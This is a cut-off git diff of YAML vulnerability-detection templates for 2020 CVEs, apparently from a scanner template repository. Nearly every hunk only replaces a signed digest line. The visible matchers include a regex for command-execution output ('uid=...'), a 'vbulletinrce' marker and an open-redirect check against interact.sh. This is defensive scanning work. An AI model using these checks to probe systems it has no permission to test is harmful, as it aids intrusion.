a/http/cves/2020/CVE-2020-11854.yaml b/http/cves/2020/CVE-2020-11854.yaml index d1e3f0fc47..4f8d97a860 100644 --- a/http/cves/2020/CVE-2020-11854.yaml +++ b/http/cves/2020/CVE-2020-11854.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202eefcf466ed72651eeab1d8bf23cbe0bdbcf604572fe6f911152d1797e3403fe02206d8b03adb34e84cc9c30142bb58a79fd01e43ea9a93aa0119040d8b58d29cb1f:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220779b053fdc6fdd7c974caaefbb6c69174b43457d85c2cb02515cbeca4bf891de0220073f97375685330692da69cfcc2e1f75430d067b620b8e8deddca5103507c43f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11930.yaml b/http/cves/2020/CVE-2020-11930.yaml index 154c51106c..0617cfe629 100644 --- a/http/cves/2020/CVE-2020-11930.yaml +++ b/http/cves/2020/CVE-2020-11930.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210093e741e8961120b05180aa2517431d8512bb2b08702667a7cd37b45d1d6154f3022100f58a4f6b589ed02b23948d7de87c5d3897cf29bf0f0baba0a6a5de5ba60ed94e:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202afa7641582371ac68b361dd2311f14abcdf782f4e4124008ecf24c44bd12866022036daf15d7d41e5c93d1327e0cba3d5c0efcf29530252f91482ea2e321e914e6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11991.yaml b/http/cves/2020/CVE-2020-11991.yaml index 77c55f856e..1dc2f7df21 100644 --- a/http/cves/2020/CVE-2020-11991.yaml +++ b/http/cves/2020/CVE-2020-11991.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402207ae49b3c8242c1522b6b0fe4e6e76646f3457ec08018c34b962a818c3088d94a02202938c0d87cefae4652dc259847ae856f960520628cde57757809818a448d1fe3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ae507c3b3ae5072dacdc01be86e611fa5af3b7c55417b6b94fea859313360f1a02201c6c9a3bdb9f9f195f1a4309cd1dd43f4637dd0dfb83127f59c4d611285d7182:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12054.yaml b/http/cves/2020/CVE-2020-12054.yaml index 113f24e9fe..aecf1cf580 100644 --- a/http/cves/2020/CVE-2020-12054.yaml +++ b/http/cves/2020/CVE-2020-12054.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100958147ed96f162815a1f7d3cd6a21c800d94fdeae0f27606c3e3e2c1540654b502203eac3084a25fc2b0de5eae0e2d1cd43fdfe35763d66578a2e903476168a23ec2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207cf22028957e72f084f7d45ebf5fd0d54ee681a53a55b7af4a41693b21bd36fd0221008b3004066c8c65c4d5b90ba742759ed8a8771a74e8558958a786837dcaab0609:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12127.yaml b/http/cves/2020/CVE-2020-12127.yaml index 152d1d31f8..9583b2b1dd 100644 --- a/http/cves/2020/CVE-2020-12127.yaml +++ b/http/cves/2020/CVE-2020-12127.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100e562d39160264508205373ca7279d074b016162686a001e5216cd9baefb5fbc8022100fabc055324c71379fab25a2a5b89a07f65c40a565bc9ae00ec7361a481f94668:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100985d71f6b2e15125213029a40a466cfd436ff8688ec853771640a7b698489cfe022100c6d539e38a9da77dcf32492509217595939f6d1aed252e00320377ca9f36c946:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12256.yaml b/http/cves/2020/CVE-2020-12256.yaml index 114c234b82..856a95b492 100644 --- a/http/cves/2020/CVE-2020-12256.yaml +++ b/http/cves/2020/CVE-2020-12256.yaml @@ -50,5 +50,4 @@ http: - 'contains(body_3, "") && contains(body_3, "rConfig - Configuration Management")' - 'contains(content_type_3, "text/html")' condition: and - -# digest: 4a0a0047304502200a3a32c891387437fd8c7d8735e9a379245e38d4bc623dc12cf3b7d7a6fca44b022100a7ab1c02916692c0b5f7019ef6f6a86329ba13592127b68367e0d9d7fe252d65:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ed2eaa27a374d663e75098f5ebca2e185f9c02aeb3d2613774a22fb5d9be739402203b9d2dd2fda58635e0cf3d4a42498f05007c93f509b1f37ea87d4da3796c3ab9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12447.yaml b/http/cves/2020/CVE-2020-12447.yaml index 1fd50e4f0c..255015cc99 100644 --- a/http/cves/2020/CVE-2020-12447.yaml +++ b/http/cves/2020/CVE-2020-12447.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502207ef0a68de5132fc2f805f5d059e036618ca6fc274f8e3be4d1584844aa320e4c022100a7cb0016a51619659d11ce719bc788067c020a580c30a6b31edc6dd1bee19fb2:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e6d4abc8d8247a4470ff575d181a9f325157c3483357f3afa0a4f8a0674a3d0e022100da321678a98089a9a37778d534828f957624523bbd010be67b0a8e4e2029e345:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12478.yaml b/http/cves/2020/CVE-2020-12478.yaml index 88a4e1acf3..029ba83e88 100644 --- a/http/cves/2020/CVE-2020-12478.yaml +++ b/http/cves/2020/CVE-2020-12478.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100cf32e2ec5cc739552ecaf7446853292540a8b17faccad0bd8e7f10e26fd9bbfc02205fc93abdc6f9200d13270d1629f097bffefe28ad84693ff52ab828868a0fbebc:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203dc0ce67bc4d4b1dafbef287f516eac5f9124442c7456f5d5b619b3a52b6f1550220203abc0dae91e1aa880ab9a490822a4bf0e8c0a4624cb6a704b763b97f0f4f97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12720.yaml b/http/cves/2020/CVE-2020-12720.yaml index 3dc061d37a..a0a28101ed 100644 --- a/http/cves/2020/CVE-2020-12720.yaml +++ b/http/cves/2020/CVE-2020-12720.yaml @@ -42,5 +42,4 @@ http: - type: word words: - "vbulletinrce" - -# digest: 4b0a004830460221008b90a4e16e95d77d04e30b42b2cb085361a63c19c0803f856685ba56b8d71725022100a4ca8e27ebdcd16a7538281367eae6f0dd0dbd46df6336f7bce71ab3cc89ffd8:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207bfa314a8ce1553ddeb838ab438424822bacb2b9cba54377e5d87f86c81938a7022100f2d374b228596c8791050c7271def53246bcc36bba2044986da90f291462894f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13117.yaml b/http/cves/2020/CVE-2020-13117.yaml index 063a4ed876..53748174c4 100644 --- a/http/cves/2020/CVE-2020-13117.yaml +++ b/http/cves/2020/CVE-2020-13117.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100825b11dbc08f92e66ef1e55c2e781050d55cc2e47f56d8ae2f952b5dbe06cea2022100b88338d05c5770146c102f5745a662b1f186188a1135230172a04cf838db3c44:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d339b9bdf51d295ece2adf01d313f60fd84fddc9d9c5864c82cd0388ca94f583022100b4e5d379efc2add266fe7d053c16173ef5f09ea0d509e60abc2bb475dd18d253:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13121.yaml b/http/cves/2020/CVE-2020-13121.yaml index ad83e0e5f8..5de135147b 100644 --- a/http/cves/2020/CVE-2020-13121.yaml +++ b/http/cves/2020/CVE-2020-13121.yaml @@ -41,5 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 490a004630440220434bbb6c4636fb4a6c08dce8b0adc02dd157ef6bc7ae762989503b11aeadbca102204c14368fac70cd17f819c41f3a09e44b6bd919b83f390cd293da4946ca78c527:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100df8ae64f8317e7e921cbd43a71df31e480eb6054b741d861f89509cb929bd22f02204f7c13aaf666f4953dfcfc03916d1a3e9d8958f53b18ff3a984d5055ff23296f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13158.yaml b/http/cves/2020/CVE-2020-13158.yaml index d428a7fc22..5f3c2bc469 100644 --- a/http/cves/2020/CVE-2020-13158.yaml +++ b/http/cves/2020/CVE-2020-13158.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502204abecd28556cb3176a2cf9bfe8619d8ae84e410afe8878a9d2314410bec7a2aa022100f15942e38dbd87796bf0587a5133854378b234091fb1b571a5735106764abc8e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f1da256343729e96bb9ea587e5c580114ee2447495f6a05ef48140fbafcc7b09022009af5fe5c72d72d41098a96985135904d178e978b3cd3cf3491122c3e6d28881:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13258.yaml b/http/cves/2020/CVE-2020-13258.yaml index 9ea51cbe6a..5d276aa6dc 100644 --- a/http/cves/2020/CVE-2020-13258.yaml +++ b/http/cves/2020/CVE-2020-13258.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220296409ed3a03f7d2f83ad8978de3e0bb77ca47c566641e3674c43fc904fa707f0221008afc8065a43e29436481a24908c4e975de09e50a20f1b0b3e31a69125a570993:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008ac43598d1901c78254939c1c939a0b5187dadf8b71f58cd8e15949b29c1850302207a2d6a4b632fc8234dec6232e38e41e31b079ab75071ed180c42cba4bc5fb2f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml index c92ab04977..a9333cc93e 100644 --- a/http/cves/2020/CVE-2020-13379.yaml +++ b/http/cves/2020/CVE-2020-13379.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100d5efb895362023eb878fcb992d835cecfd1a80fd38e7d1c625f36e9cd2232370022028ea890144e05a6acd95382b28ffb0fce13115ee9d09692dfaae3f81f40e282c:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d0cd744b5f21ed43f461035d94b6b70a30e0f94cd3ba6ddd0c5ee2d7ada63f92022100df1e47914b1f429324608ac9a88c77280a1a3db96476fe323318e3d881eb08ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13405.yaml b/http/cves/2020/CVE-2020-13405.yaml index 675dc1c941..14a36b5ea9 100644 --- a/http/cves/2020/CVE-2020-13405.yaml +++ b/http/cves/2020/CVE-2020-13405.yaml @@ -52,5 +52,4 @@ http: - 'status_code==200' - 'contains(header,"text/html")' condition: and - -# digest: 4a0a0047304502202af04a1425ca7ed59c7818534f2ce24f12dd91139fe6125109f963d32d4b89d0022100ac595befc59092b06d44f96e7d3a116e1f295cee51cd491fe4c0017adceda792:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205c21394a31ff5034ede55470c230ad818613d8efe23f67fc81f5121d8abd4fa302202a5290dc8d2d51d56c8c0e57956a7713facc7fe4b264176a1a7b134028c92937:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13483.yaml b/http/cves/2020/CVE-2020-13483.yaml index a91b8f071c..e3e5974afa 100644 --- a/http/cves/2020/CVE-2020-13483.yaml +++ b/http/cves/2020/CVE-2020-13483.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220096ef4616fffc311f29cfe80048a0839672858de3e09c75b759b93287b29430a022006e0e57938a99fcee99f8167841417cae03a1e6b49a1311bf23fa63b3878fc0c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201ebff8dc33349feb68ad025b763e002c62dd3a3d3fe79210b8c092d1bc8b7402022100f765da1869d1d2edee0e29b52dfbfec1e0e6380d4182d873c8c64276c9567bf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13638.yaml b/http/cves/2020/CVE-2020-13638.yaml index 99345c852c..70faabbf36 100644 --- a/http/cves/2020/CVE-2020-13638.yaml +++ b/http/cves/2020/CVE-2020-13638.yaml @@ -97,5 +97,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221008c9c22745795114d2911ae317c612d7263427df8b836234c86f3b51c31d9d317022034163a5a1156f27ca167b94ee9064b735423f0649b7faf2e82bb3d0545850cdd:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022015e5fc9a61c78253a2216a3ce98ede1e6d55b3f1794d0336f3fadd424aa78575022100abde1c6b583d8911c934593cab572c33b25a79e49a7e4adb7457e03d0a067e37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13700.yaml b/http/cves/2020/CVE-2020-13700.yaml index bf803d114b..ab8cccb120 100644 --- a/http/cves/2020/CVE-2020-13700.yaml +++ b/http/cves/2020/CVE-2020-13700.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100bbd5e7646cca9bc29428b2b3db31b2d566d2eb83af3a5789e28d318bf97166b5022100881a6e14f54fec4a73fd835cac72d918752f2198d09947dd2eebbc0891edf917:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100edefcc205f8077babf91d6c389a2c46c94d0ac730f45241bce0d153e5201b58c02205c87df56ef40360d313bf1ed5ef8ec7ff3b3676652b484224e367daac3707f05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13820.yaml b/http/cves/2020/CVE-2020-13820.yaml index 652a91d70f..9c221e8e44 100644 --- a/http/cves/2020/CVE-2020-13820.yaml +++ b/http/cves/2020/CVE-2020-13820.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022063bf4a9b4f60870503a6fc8083a13cd8e0980a7a196a51e75b45f2040d3f5c0e022100a187a29e42b8d47b3945b9fbe9ab4d72ec04492ad1eb490e9690b81e94826813:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100930c7aee3bd07d44f1da2dc44bd2dca3e878ad0795324b6ee129db8b65069b4e02206b01752bbd7c134f1cfcbd6845226315d16dd48c51093f2fa3f41b85c8875884:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13851.yaml b/http/cves/2020/CVE-2020-13851.yaml index 0e2a0175b2..4d9f9191fc 100644 --- a/http/cves/2020/CVE-2020-13851.yaml +++ b/http/cves/2020/CVE-2020-13851.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221008d5e0f65e96663348f5a799ef1108e51436ba03af2d600a3bae6bf3be3d8b044022100e20181681ea02a8d1da8fd45e76256a8f1916952007d10897121526da2a535fd:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022027b8014082216952de9db55b69b19e011be0a22469f76eabc7456e4641ac2a49022100d261d83c34f0fe1bc4a8916a1e08c0d595aa53543d4cf2daef6eba41cf067728:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13937.yaml b/http/cves/2020/CVE-2020-13937.yaml index 9e26441638..4fe9608747 100644 --- a/http/cves/2020/CVE-2020-13937.yaml +++ b/http/cves/2020/CVE-2020-13937.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a446c6bda853c8250977694a19e3689a1bb7cb5441419a0fb3573451960deec6022100d56912b30e79a5634f4ff2bc378941620128ab39ef25fc789198e94153488416:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206c8945bce3f136cdbba25c2f7f27bfd94deb8961c5eabe083fdce9ea74bc22a2022100ba218cf73bcf084fd96ff1208e0d04c692690c1ae80c8d72e59a25fbb3f5e71c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13945.yaml b/http/cves/2020/CVE-2020-13945.yaml index 46139499d7..53ea36150d 100644 --- a/http/cves/2020/CVE-2020-13945.yaml +++ b/http/cves/2020/CVE-2020-13945.yaml @@ -65,5 +65,4 @@ http: - type: regex regex: - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" - -# digest: 490a0046304402201f3c989d883089b995daf1c9df1021482a9c12ec6a6e06b4646bd1071d29528c0220631fb0ebb62c289083de826c3058711a6bc9c9b993f21781541e9cc2bf55cdb9:922c64590222798bb761d5b6d8e72950 +# digest: 480a00453043021f6f3f82912bd3fa5db3e865e0480c7a0a4af42a391e9e9cb01f38eebf89170e02201601b7bf8b16c7ab68c06b410375ab884e54b1af4afe234ee2de51f22d133261:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14092.yaml b/http/cves/2020/CVE-2020-14092.yaml index e0fa0a9f15..7904bdfbd7 100644 --- a/http/cves/2020/CVE-2020-14092.yaml +++ b/http/cves/2020/CVE-2020-14092.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220242814800e8d3658b11875de5e0feb8e715a672baa3454b37b8ae80ec9fc199a0220127cdea7b80de69ac1466e79e936ff95e8b4abc09c976fe70ad8611d213a2c64:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202bb519257b8fd8ca518f3aed58eb68ab10687f09ecf49d511e9912157a215534022032035bdcdd64889d210f1a30f697be18adbdd8d74ba84df7a925216f7fc71d04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14144.yaml b/http/cves/2020/CVE-2020-14144.yaml index c1fc73f632..9ac7b2deba 100644 --- a/http/cves/2020/CVE-2020-14144.yaml +++ b/http/cves/2020/CVE-2020-14144.yaml @@ -100,5 +100,4 @@ http: regex: - name="last_commit" value="(.*)" internal: true - -# digest: 4b0a00483046022100e0a91338f1b2fd227aa748f4f431983a07255402ffba96f241d8c43560a7a8f6022100b6b7309f9a88cf7ede9ca74784596b6ea13f1ed1a319864fa7d025d18906c856:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207e7a63c748451e82a144b1830de2e9ecb7e3088d8ed4186c447dde52ff010a70022100c773cd775c64a8f41dc109fade966e45e674f0105c7c876db1e575c0a98e306d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14179.yaml b/http/cves/2020/CVE-2020-14179.yaml index 26bf9dc354..02e658e13f 100644 --- a/http/cves/2020/CVE-2020-14179.yaml +++ b/http/cves/2020/CVE-2020-14179.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100f6b7a89dbb6f7b41df7f8fd66630448b38f6ee886c55315fca158cb04f1438f2022019abf220d7b837753c58e8caaf1e9d7de44d018de66393c76d6f965b4eefdb1f:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022021cd7133c4de8b5352da0f612a5c0f038f51d1202735952ebd96c93aca5633a902206b11987d8600960fb37df5f2b73dfede2524c70bbe5e28a59113dfe443eb5cb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14181.yaml b/http/cves/2020/CVE-2020-14181.yaml index 272b5ac43a..6634baba6a 100644 --- a/http/cves/2020/CVE-2020-14181.yaml +++ b/http/cves/2020/CVE-2020-14181.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022004544746a748044a1d870fdbca89dc00a1dfc39aa79ac6d8f8a5f2a9768de04a02200e3618ae99e872ec9fd595636d761632d30a87b1a862170164443b9fecd7c0d8:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220068cdd37770259817e1b746622f4fa0d856874ed8b7e1d87d8abb5099188dff9022022cde71128ef4e091833053545b17ae75ad2b0e093d827a41e3e7d895cf62dc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14408.yaml b/http/cves/2020/CVE-2020-14408.yaml index 81e96cbd94..00dfae71b9 100644 --- a/http/cves/2020/CVE-2020-14408.yaml +++ b/http/cves/2020/CVE-2020-14408.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220746d77e93fd4f317e7e7a2462c5f572393b988c4233b8d27234235cc0af90b5202204e744827c50ff28caf948a0f6040e5840d6bbb551473d7a1722da12e8f5aa539:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206d20f78bb36b3e851a444eb1d931dca3a1bd5c5ea9d8eb016b79d96a39a06893022046404b08125dc2fa77a17b5ef578017a39bc98f4222f870afe31654e22ade79f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14413.yaml b/http/cves/2020/CVE-2020-14413.yaml index 9177e2388f..a49e2ba96a 100644 --- a/http/cves/2020/CVE-2020-14413.yaml +++ b/http/cves/2020/CVE-2020-14413.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402205069a19e381c2117b9566c7ff7a9938692ec80a2815c445363fea020319bcd86022000a097b4ac2b6f540ff94e9fe11763e2e7ee56ac3302292819b0206ae71ac1cd:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022049f9cb91e15c639b7c07bf9ff3e0b8bd912e287e256ac6d389de8fae2fb9b405022045295b689a60edcda691b492163f2a8d6d0e263c34b5f5d22691ff960741ca8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14864.yaml b/http/cves/2020/CVE-2020-14864.yaml index a82b5ac838..c558f1e1c8 100644 --- a/http/cves/2020/CVE-2020-14864.yaml +++ b/http/cves/2020/CVE-2020-14864.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100ee11df24523dfb114afb04932637b14642794475816861381a5590aefa9eb066022100a418a6cc1177e351a9d678155d945907e096aa026479834b0709641c55dcf6ca:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204c443707a09ba09906721855d5b480d43c2f5254e236dac9b813e3cb022deae0022004fca4e3df01ab6e4415f8a32758b87c740ae41826f5b533809b4aeede25e937:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15050.yaml b/http/cves/2020/CVE-2020-15050.yaml index 9b172d7d8e..5106f0a236 100644 --- a/http/cves/2020/CVE-2020-15050.yaml +++ b/http/cves/2020/CVE-2020-15050.yaml @@ -38,5 +38,4 @@ http: - "fonts" - "extensions" condition: and - -# digest: 4a0a004730450220303187fefbf0a060cae0d12a0e0f76637321a0a00fc47216c502811b98c9aecc022100a9445b7f146e62d0e5482f7e5b6b47b801f58e16ee817709fd55bfbd0223ef9d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022050fd2e1047f202be324db376765ad82c45d5096757a6b9599bfeda3287fd699b022100bdf2376ecd85b7e9b0a1403dd31ae15d95e8d6e5a733bcf9b2e252137e2eb3bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15129.yaml b/http/cves/2020/CVE-2020-15129.yaml index cacf876804..abf8b777d8 100644 --- a/http/cves/2020/CVE-2020-15129.yaml +++ b/http/cves/2020/CVE-2020-15129.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 302 - -# digest: 4b0a004830460221009e693cdec9f2452705d7e7986a57e035dcab360e1a71a8eda0c63abf41a3471a022100f7caa7fdc39753d0d6bf090b69356668cebc28e585035b1d215afa866f6d6670:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100bd128974de498d5942fda9fcce6033129271273fe019f00d93a2391bfc61370b022100e060788582820827a87aab025b490ba85f147ef3737f9258b257458ff3a2a549:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15148.yaml b/http/cves/2020/CVE-2020-15148.yaml index 627682dee8..f2fcaac9e6 100644 --- a/http/cves/2020/CVE-2020-15148.yaml +++ b/http/cves/2020/CVE-2020-15148.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 500 - -# digest: 4b0a00483046022100b882f95842f9e2bfd3fd71eda118d93d09d085057b3b983ca3f6c02f428c5417022100b00979189101e1d6d0e8e6a13f2763751bb90c83766a34804b1bd8ac41b68847:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a2712084ece268021455491a30e88f06717173f310c2fee1792ca3d5a0ec7ebe022100f8e6e1b8f0380c07b1cc0922e9dafd1e696a6bc010cf8975cce80160f6f0314b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15500.yaml b/http/cves/2020/CVE-2020-15500.yaml index c945a6a94e..33b7055aed 100644 --- a/http/cves/2020/CVE-2020-15500.yaml +++ b/http/cves/2020/CVE-2020-15500.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220376b1333d523915131accb5400412e5f1e55c554b1a51c64feea5c74a69797950220260bc36f8f98f298e34b1926f49c51e1e6f4ab1af5bba8cfa43c95c8b1033c6c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009f5db59946a1e89395329a9449b938158b4f0c4266823c3deee3c820c53775a1022051bffbe967f51ecd700d999869e3e1455dd57866b883d5ba0b849c97cdee830c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15505.yaml b/http/cves/2020/CVE-2020-15505.yaml index 5ff25bc21a..23e2889e40 100644 --- a/http/cves/2020/CVE-2020-15505.yaml +++ b/http/cves/2020/CVE-2020-15505.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402207201caf4909dc7dd7c1f1d6eee6b086423f1bb136c4374cfff8a2030085e316102202a9bc4fff9783376c3076d9fbc3063c3c4959769b366d8636577446f6e924fd2:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009f8e467719df167a40240cbb01fc96e7a8a481339948dd4cb125f6612c022178022100f088ae4f47ab3e16a9b1c016889e4adf55d4fe3031ee4105fddf53ee1ed2a203:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15867.yaml b/http/cves/2020/CVE-2020-15867.yaml index 56e178d12a..3eb8585b5d 100644 --- a/http/cves/2020/CVE-2020-15867.yaml +++ b/http/cves/2020/CVE-2020-15867.yaml @@ -98,5 +98,4 @@ http: regex: - name="last_commit" value="(.*)" internal: true - -# digest: 4b0a00483046022100d5b4214ca3eeaf9b881a0ed1eb067d2544eef31072861d25adef5749e62e85ac022100e2b5a52dd0ab316de28f0c8e90947f8f8173aed54c7c8998598047ed325bd637:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100dc453086e4fc5078938440f3eced7b6c267ab70ba4d98e6d82c7326362c301c0022044ecbd0096a62026305aa4c58a81d1e4062888511faf0db6e39ee62822fb1d40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15895.yaml b/http/cves/2020/CVE-2020-15895.yaml index 00d0944f74..44b56527b4 100644 --- a/http/cves/2020/CVE-2020-15895.yaml +++ b/http/cves/2020/CVE-2020-15895.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100ff3a2a2b126c78c512346f97f519e32a4f5cdeeb4aaa0c5b8a7e4e70e5a3fba702210089566127d7c7ca64c0bc59845cd6520a785f6694bbe4625dd93508ff76f0ca39:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201c9d37ef98be12ecf13cd97267b426eb665cf6ab2f6d0042f33c49abf4ec6bd80221009a727e55148ce6f3f102bbf3752f13534c94b8e689ea24fa583824324bea976c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-16139.yaml b/http/cves/2020/CVE-2020-16139.yaml index d3dba339bf..5785683023 100644 --- a/http/cves/2020/CVE-2020-16139.yaml +++ b/http/cves/2020/CVE-2020-16139.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100d8ed30a65b8d4aac349ac3da4f3bc068c989d5acdf904d8789665c1489ca63d6022100ed9a718939f53ca62f910b15f50030281828ba8cdfa890b9d373818ee9902545:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c4d2bf47fae222946686d19d87dc0e6f38cddd8e4eabe40ebca896869dd79524022034c772db670e25acecb3de89762684664d9375c26a4a9ff5c61f11cb5645e6f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-16952.yaml b/http/cves/2020/CVE-2020-16952.yaml index 9d4baa2cd6..bb411bf672 100644 --- a/http/cves/2020/CVE-2020-16952.yaml +++ 